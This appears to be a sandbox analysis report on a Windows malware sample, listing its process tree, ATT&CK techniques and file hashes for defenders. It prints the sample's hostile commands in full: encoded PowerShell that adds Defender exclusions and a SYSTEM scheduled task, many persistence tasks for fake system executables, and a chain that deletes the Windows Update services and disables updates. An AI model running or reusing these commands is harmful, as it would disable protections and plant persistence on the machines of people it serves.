"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:2344

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:1048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\StarPredict.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\StarPredict.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:400

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\StarPredict.bat.exe"
4⤵
- Views/modifies file attributes
PID:4316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default User\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\odt\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsPopUpM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\MsPopUp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsPopUp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\MsPopUp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsPopUpM" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\MsPopUp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\portsurrogateproviderIntobroker\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\portsurrogateproviderIntobroker\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:64

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\portsurrogateproviderIntobroker\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Desktop\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default\Desktop\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Desktop\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\AppReadiness\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\AppReadiness\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2412

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:1104

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3060

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1440

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2208

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2192

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4936

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:2180

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
- Suspicious behavior: EnumeratesProcesses
PID:4916

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:2348

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:4192

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:3996

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1964

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5084

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2624

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3476

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4204

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1100

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4632

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
- Blocklisted process makes network request
PID:1256

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:4960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:4116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:4076

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:2432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:2692

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:3856

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3244

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4352

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:3868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2140

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "bosjczbpam"
2⤵
PID:3140

C:\Windows\explorer.exe
C:\Windows\explorer.exe lhjhhfereinutqkk0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUJUDxpO3xQsm1i/s1JWMxbg4CDDUjUzNRskPjZWvNKNodOgKV2HJ8tTN0QVJgDyg+2bViTlti9ZxC5n49dcOUKQgK8rh3k8SmDF6+u9ZQ5hRhwXNv/1S1TKEHJpFva5VT15ywFxRzv+p6QJjNw/L6ZZoe3/92cs2DQxDkoE3IsIzkx9TTRmCLGdVqAhSSaqD/gWCF8syjnqONW8nAkIDCaiX6JyJkuCgTuOQv8CpGeKv1VALuliP/ha8Yjhtr6HMGk2rtUy+qneh6aJBuRE2Vl54snxeUp5YsY49VDdIyEysvbl9BsEUC35mC2kOBCmxC0JxCaQIXPdfkaqqK0slLenN1msO3trj6XDK8r1gefSJa5eSdUWn80xUbCsMx+vSBw/fgeBKOpIbO3PFsHY47GpDwiBS4J/sfvFzm9Z81e/R0fe5W8jG0UPs4d7gICDhbEElYG2jSwHbK0S6OPBDvA3oFTND9PNmzn3LH3zqfX+FjpyLAxPdNktvAJH72zq+MPDCIF7jYmQ5wBcD3ROPUkA==
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3248

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3700

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:660

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Recovery\WindowsRE\dwm.exe

Filesize
2.8MB

MD5
b841384ed264394d964d423097640cda

SHA1
65319c5a9115d4dd5a7271c053853983076b3c5b

SHA256
6e0dc3f16af7e127b660beecbaee88d189f8ad0ffc9063208ad466368b356855

SHA512
1410d113a35ac161f57ad4247915da8b7d8aed915391a3cf71748a2b6945574400e0cda53d4ef70e6e4e4ddeb135392fd82dc4e03e978f46da35ee6c1f5e3d5b

Download Submit
C:\Recovery\WindowsRE\dwm.exe

Filesize
2.8MB

MD5
b841384ed264394d964d423097640cda

SHA1
65319c5a9115d4dd5a7271c053853983076b3c5b

SHA256
6e0dc3f16af7e127b660beecbaee88d189f8ad0ffc9063208ad466368b356855

SHA512
1410d113a35ac161f57ad4247915da8b7d8aed915391a3cf71748a2b6945574400e0cda53d4ef70e6e4e4ddeb135392fd82dc4e03e978f46da35ee6c1f5e3d5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
680d53abec2dfbffd7989c09513d5f87

SHA1
267916eb63de1b972aab20f6310eb5f43700b10b

SHA256
724b40911b267a352610d2fc5f608d0d9d0c58dfe00cfdd637b51487e8fca7b8

SHA512
6690a1a8ef9bb7df0b560bb1bf25676f45ea3d108bc5bf2f09fce3ad2e74c20f3251440dd3a5d4af8f8978c7875a55e7a5919a0083bd5bf32df64d4d3299240d

Download Submit
